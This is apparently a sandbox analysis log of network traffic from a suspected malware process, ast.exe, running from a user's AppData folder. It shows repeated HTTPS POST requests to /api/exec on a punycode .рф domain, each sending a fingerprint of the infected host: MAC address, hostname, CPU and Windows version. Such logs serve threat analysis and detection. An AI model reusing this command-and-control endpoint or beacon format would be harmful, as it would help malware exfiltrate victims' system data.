                                                                                                                          28192.168.2.550078212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:43 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:43 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.550081212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:44 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:44 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.550084212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:45 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:45 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.550087212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:46 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:46 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.550090212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:47 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:47 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.550093212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:48 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:48 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.550096212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:48 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:48 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.550099212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:49 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:49 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.550102212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:50 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:50 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.550105212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:51 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:51 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.550108212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:52 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:52 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.550111212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:53 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:53 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.550117212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:54 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:54 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.550120212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:55 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:55 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.550123212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-19 18:15:56 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                          Content-Length: 269
                                                                                                                          2024-11-19 18:15:56 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.550126212.193.169.654433380C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          TimestampBytes transferredDirectionData
